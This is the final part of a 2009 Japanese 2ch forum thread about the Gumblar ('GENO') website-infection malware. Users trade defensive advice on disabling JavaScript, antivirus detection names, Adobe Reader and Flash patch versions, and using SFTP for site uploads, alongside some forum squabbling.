firefox使ってて、IEはUpdateぐらいしか使ってないんだけど
念のためIEのjs無効にしたいんですが、どうすればいいですか?

IE6です

924 :192.168.0.774:2009/05/19(火) 16:09:36 ID:Zas2UFdp0
>>923
調子こいてんじゃねえよ、クズが

925 :192.168.0.774:2009/05/19(火) 16:10:26 ID:m0FB93L50
>>913
JSRedir-Rってどこの会社の名称だかわかる?
バスターも全く同じ名前使うとは限らないんじゃね?

926 :192.168.0.774:2009/05/19(火) 16:12:13 ID:99Yfmhuj0
>>923
IEのインターネットオプションのセキュリティでレベル高にする

927 :192.168.0.774:2009/05/19(火) 16:13:23 ID:wA8EwCsv0
>>925
え、JSRedir-Rって各社共通の正式名称じゃないのか

928 :192.168.0.774:2009/05/19(火) 16:13:31 ID:kJyJeNwQ0
ラベルの低いレスが続くな。

929 :192.168.0.774:2009/05/19(火) 16:13:40 ID:MmxOqtet0
>>924
www
なに怒ってんの?

>>926
ありがと

930 :192.168.0.774:2009/05/19(火) 16:14:17 ID:3BLcPAxKO
>>489
Adobe Readerの8.1.5/7.1.2とAdobe Flash Playerの9.0.159.0も
現時点では脆弱性修正済み版だと思うのですが
もしあえて載せていないとしたら、何か理由があるのでしょうか?

931 :192.168.0.774:2009/05/19(火) 16:16:57 ID:JNA/OZ/u0
>>930
古いverだぞ
使わない方がいい

932 :192.168.0.774:2009/05/19(火) 16:17:13 ID:hiiH6ZqeO
>>929

933 :192.168.0.774:2009/05/19(火) 16:17:36 ID:xM/A09or0
>>929

934 :192.168.0.774:2009/05/19(火) 16:18:44 ID:hiiH6ZqeO
ミスった

>>929
まとめサイト読んでからにしないからだよ
良かったね 親切な人がいて

935 :192.168.0.774:2009/05/19(火) 16:19:57 ID:iuUi1XGl0
ゆとりくさいのはNGしたほうがいいよせっかくNGIDできるんだし

936 :192.168.0.774:2009/05/19(火) 16:20:39 ID:7suD9PUP0
「親切」と「甘やかす」は似ているようで少し違う

937 :192.168.0.774:2009/05/19(火) 16:21:08 ID:7LHFTfC/0
初めっから教えてくれないか?
つかアドビリーダーで更新して8のままって何なのよ?アドビソフト糞杉ねーか?

938 :192.168.0.774:2009/05/19(火) 16:21:11 ID:hTeKb6gy0
ゆとり でNGしてます
NG名は”ゆとり”

939 :192.168.0.774:2009/05/19(火) 16:21:22 ID:k9iqIXtC0
なんでアンカー飛んでるひとやってるんですか?

940 :192.168.0.774:2009/05/19(火) 16:22:01 ID:F+XHHqjk0
Adobe Flash Playerの最新版が重いんだけど。

941 :192.168.0.774:2009/05/19(火) 16:22:33 ID:YZkv6Zhr0
ああ、もう学校が終わる時間か

942 :192.168.0.774:2009/05/19(火) 16:22:35 ID:7LHFTfC/0
>>930
だよなあ
ここの奴らがおかしいってことで…

943 :192.168.0.774:2009/05/19(火) 16:23:49 ID:ebHg3CWR0
>>927
それはソフォスの検出名。名称は基本的にベンダーによって異なる。
ある程度の類似性がある場合もあるけど。

944 :192.168.0.774:2009/05/19(火) 16:24:03 ID:MmxOqtet0
>>934
それは悪かったけど

>調子こいてんじゃねえよ、クズが

はひどいな・・・
ごめんね

945 :192.168.0.774:2009/05/19(火) 16:24:43 ID:ebHg3CWR0
ちなみに、BitDefenderでは、Trojan.JS.PZK らしい。(が、未対応多し)

946 :192.168.0.774:2009/05/19(火) 16:25:42 ID:iuUi1XGl0
>>944
このスレを一から読むとそう呼ばれるのも仕方が無い理由も分かると思うよ

947 :192.168.0.774:2009/05/19(火) 16:36:11 ID:Ni9zQrjI0
>>927
ぐぐる先生によると英国SophosがTroj/JSRedir-Rが猛威を振るってると警告だしたーっつーのが見つかった
定義名は最初に有名になった名前を使う所とか独自で付けるとことか色々だね
だから詳細書かれて無いとどの定義名がどのウィルスを表すのか判らんのよね…

>>930
基本的には新しいVer(Adobe Readerなら Ver9とかVer8とか)が新しいのが出たら
互換性の問題でどーしても古いVerじゃないといけない人以外は新しいVerに変えてくれってのが通常
更新停止するとしたら古いVerからだからね、今回は更新された、それだけの事。自己責任で古いVer使っても構わんよ

948 :192.168.0.774:2009/05/19(火) 16:38:11 ID:oFXr+sz30
結局、てれっとネットサーフィンするにはまだ無理か・・

949 :192.168.0.774:2009/05/19(火) 16:38:27 ID:wA8EwCsv0
>>943
そうなのか
自分今の今までJSRedir-Rがこのウィルスの正式名称だと思ってたよ
ではバスターはこいつになんて名前付けてるんだろう

950 :192.168.0.774:2009/05/19(火) 16:40:10 ID:3D8bfAV20
すみません>767も誰かお願いします

951 :192.168.0.774:2009/05/19(火) 16:40:11 ID:ULbvY9kM0
>>942
ひとに ものを たずねるときの まなーを おうちのひとに きいてから

952 :192.168.0.774:2009/05/19(火) 16:42:33 ID:JNA/OZ/u0
>>950
javascriptを切って自分のよく行くサイトに行ってみろ

953 :192.168.0.774:2009/05/19(火) 16:43:05 ID:7LHFTfC/0
おまいらプログラマーでもないのにいい加減な事言ってなよカスどもが!!

954 :192.168.0.774:2009/05/19(火) 16:44:18 ID:G5tmYxTL0
次スレいらね

955 :192.168.0.774:2009/05/19(火) 16:44:38 ID:XFldsOfqP
ははは、、バカばっか

956 :192.168.0.774:2009/05/19(火) 16:45:21 ID:7LHFTfC/0
まあ人間間違いは誰にでもある、ここいらで許してやるか

957 :192.168.0.774:2009/05/19(火) 16:45:50 ID:nMhXw8IP0
せっかくIDあるんだからあぼーんを有効活用しましょう

958 :192.168.0.774:2009/05/19(火) 16:46:22 ID:wA8EwCsv0
>>947
最新ウィルス情報のとことかに「○○(バスターでのウィルス正式名称)・通称genoウィルス」
とか、わかりやすく書いててくれてたらありがたいんだけどな
名前がわからないとバスターで対応してくれてるか否かもわからないなorz

959 :192.168.0.774:2009/05/19(火) 16:46:26 ID:t3PUBPxu0
>>957
とっくにw

960 :192.168.0.774:2009/05/19(火) 16:47:50 ID:G5tmYxTL0
>>957
とっくにやってる w

961 :192.168.0.774:2009/05/19(火) 16:48:00 ID:9IYXIU+f0
次スレのテンプレの整理はしなくていいのか?

962 :192.168.0.774:2009/05/19(火) 16:49:16 ID:3BLcPAxKO
>>931>>942>>947
レスありがとう。

963 :192.168.0.774:2009/05/19(火) 16:50:46 ID:WC8/6D7vO
規制中のため携帯から失礼いたします。
同人板のまとめの方が質問掲示板を立ててくれましたの今後初歩的な質問があれば誘導をお願いいたします。
ttp://www1.atchs.jp/test/read.cgi/gegegeno/1/
また、心に余裕のある回答者のボランティアさんも募集中なのでよろしければご協力お願いいたします。


964 :192.168.0.774:2009/05/19(火) 16:52:39 ID:OVtR6PVz0
ここの人達はマナー良いね
他の板の馬鹿も見習うべきだな

965 :192.168.0.774:2009/05/19(火) 16:53:38 ID:5LCBC34N0
その妙な敬語の使い方・・・まさしく同人板住民!

966 :192.168.0.774:2009/05/19(火) 16:54:18 ID:ESbU+FiT0
>>964
>>676

自分で言った事くらい守ってくれ

967 :192.168.0.774:2009/05/19(火) 16:54:45 ID:m0FB93L50
>>958
それっぽいのは>>913あたりかと思って見てみたがまだ詳細は載ってないのね
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_AGENT.BOG
↑参照だが通称書いてることもあるみたいだよ


968 :192.168.0.774:2009/05/19(火) 16:55:36 ID:S+Cj9H/40
Lunascape5はいいよ。
javascriptが無いと見れないサイトだけエンジンを切り替えればいいし。
Chromeはjavascriptの設定自体が無い(つまり常時on)んだよなぁ…。

969 :192.168.0.774:2009/05/19(火) 16:57:37 ID:JNA/OZ/u0
>>968
Adobe Readerとflashplayerの脆弱性を利用してるからエンジン切り替えても意味がないとあれほど…

970 :192.168.0.774:2009/05/19(火) 16:59:16 ID:WC8/6D7vO
>>965
いえ、自分は実況民ですよw
とりあえずご協力出来る方が居ればお願いいたしますー

971 :192.168.0.774:2009/05/19(火) 16:59:51 ID:nMhXw8IP0
テンプレに
サイト運営者は出来るだけSCPやSFTPでファイル転送してくださいって入れといて

972 :192.168.0.774:2009/05/19(火) 17:00:03 ID:uBRv0bUoP
>>963 せめて専ブラ対応のところに作ればよかったのに

973 :192.168.0.774:2009/05/19(火) 17:00:15 ID:tI/2CbF4O
誘導されてきました初心者です
マカーで感染1000%のところを踏みました。javaスクリプト切っててFlashも入れてません
大丈夫ですよね?1000%サイトは閉鎖済みで腐サイトですが見て頂けますか?

974 :192.168.0.774:2009/05/19(火) 17:02:27 ID:c4h/9VTEO
>>973
>>963

975 :192.168.0.774:2009/05/19(火) 17:04:17 ID:9IYXIU+f0
>>1
サイト運営者は出来るだけSCPやSFTPでファイル転送してください
>>2
>>3
>>4
>>6-7
>>9
こんな感じ?


976 :192.168.0.774:2009/05/19(火) 17:04:19 ID:u/iigQcW0
まともに機能しないチェッカーは混乱するだけな気がする。

977 :192.168.0.774:2009/05/19(火) 17:04:50 ID:o+4dTohcO
>>966 ワロタw

978 :192.168.0.774:2009/05/19(火) 17:05:00 ID:YPsJVP/N0
>>972 対応してる その1/ はスレ番

あとでみてみよ

979 :192.168.0.774:2009/05/19(火) 17:05:02 ID:WC8/6D7vO
>>972
JaneStyleとかなら板追加すれば見れますよー
他の専ブラは分かりませんが

980 :192.168.0.774:2009/05/19(火) 17:05:10 ID:wu49YE+90
>>961
上のほうで、テンプレを改良したのがある。
最新の亜種は、cmdとレジは起動できる

>>1-7,9,413,68,74,100,156,166
gHdwI20D0を参照にしてテンプレ改良。
これから、用事があるのであと頼む。

981 :192.168.0.774:2009/05/19(火) 17:05:53 ID:S+Cj9H/40
>>969
確かにその2つが元凶だろうけど、javascriptも原因の一つじゃなかったっけ?
javascriptをオフにするようにも書いてあったし。

982 :192.168.0.774:2009/05/19(火) 17:06:33 ID:tI/2CbF4O
>>974
どうもです

983 :192.168.0.774:2009/05/19(火) 17:07:44 ID:JNA/OZ/u0
>>981
エンジン切り替えてもjavascript切ってたら意味ないだろ

984 :192.168.0.774:2009/05/19(火) 17:08:10 ID:m0FB93L50
>>967だがGENOウイルスという名前が付くかどうかはわからないな
GENOの対応はまずかったようだが一応企業な訳だし配慮することは考えられる

ユーザーからすれば調べにくくて困るけど

985 :192.168.0.774:2009/05/19(火) 17:10:10 ID:u00yUEHF0
ScanSafe先生のお墨付きもらったんだからGENOでいいじゃん

986 :192.168.0.774:2009/05/19(火) 17:11:41 ID:7suD9PUP0
感染サイトへのアクセスログ(ウィルスの書き換えクローラーの足跡)は需要ありますか?

987 :192.168.0.774:2009/05/19(火) 17:12:09 ID:wu49YE+90
>>984
>GENOの対応はまずかったようだが一応企業な訳だし配慮する
から、GENOウイルスという名前で報道できない推測される。

988 :192.168.0.774:2009/05/19(火) 17:13:01 ID:brw6v9+T0
連日連夜ご苦労様です。皆様のような知識がないので、なんの力にもなれない
ROM人ですが、こういう状況ですので、>>241の提案された質問スレ、>>345
コボラーさんの提案されたUNIX板でのスレ立ての件、検討されてはいかがでしょう。
と思ったら>>963が、すでに……。

989 :192.168.0.774:2009/05/19(火) 17:14:27 ID:oJ5eOA/M0
あります

990 :192.168.0.774:2009/05/19(火) 17:14:30 ID:nMhXw8IP0
>>986
見たい

991 :192.168.0.774:2009/05/19(火) 17:15:06 ID:G5tmYxTL0
ttp://hpg2.me.land.to/srcchk1.html ここのブログのとこ変だぞ?

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.access-counter.com/p.gif&client=chromium&hl=ja

ソースチェッカーが規制されてるんで誰か頼む

992 :192.168.0.774:2009/05/19(火) 17:17:25 ID:YZkv6Zhr0
>>992
チェッカーにかけてみたけどそれっぽいJSのソース見当たらないよ

993 :192.168.0.774:2009/05/19(火) 17:19:01 ID:YZkv6Zhr0
間違えたorz
>>992>>992宛ね
JSをたくさん設置してるからそれに反応してるのかも

994 :192.168.0.774:2009/05/19(火) 17:19:40 ID:7suD9PUP0
>>989
了解しました
同人板は終わっているのでジャンルスレが大抵もっている他板にある雑談スレの
言葉が通じるところで呼びかけてきます
他に何か欲しい情報があれば可能な限り聞いてきます

995 :192.168.0.774:2009/05/19(火) 17:19:42 ID:brw6v9+T0
連日連夜ご苦労様です。皆様のような知識がないので、なんの力にもなれない
ROM人ですが、こういう状況ですので、>>241の提案された質問スレ、>>345
コボラーさんの提案されたUNIX板でのスレ立ての件、検討されてはいかがでしょう。
と思ったら>>963が、すでに……。

996 :×>>992 ○>>991:2009/05/19(火) 17:19:44 ID:YZkv6Zhr0
……('A`)もう寝るわ

997 :192.168.0.774:2009/05/19(火) 17:19:58 ID:kY8OD79y0
>>993
落ち着こうぜ

998 :192.168.0.774:2009/05/19(火) 17:20:09 ID:jelFdgMzi
えっ

999 :192.168.0.774:2009/05/19(火) 17:20:18 ID:oJ5eOA/M0
なにそれこわい

1000 :192.168.0.774:2009/05/19(火) 17:20:41 ID:abtxHDvw0
やっぱりやっつけで作っても使ってくれないんだな
http://end.if.land.to/geno.php?url=http://hpg2.me.land.to/srcchk1.html

変なとこなさそうだけどな

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

260 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)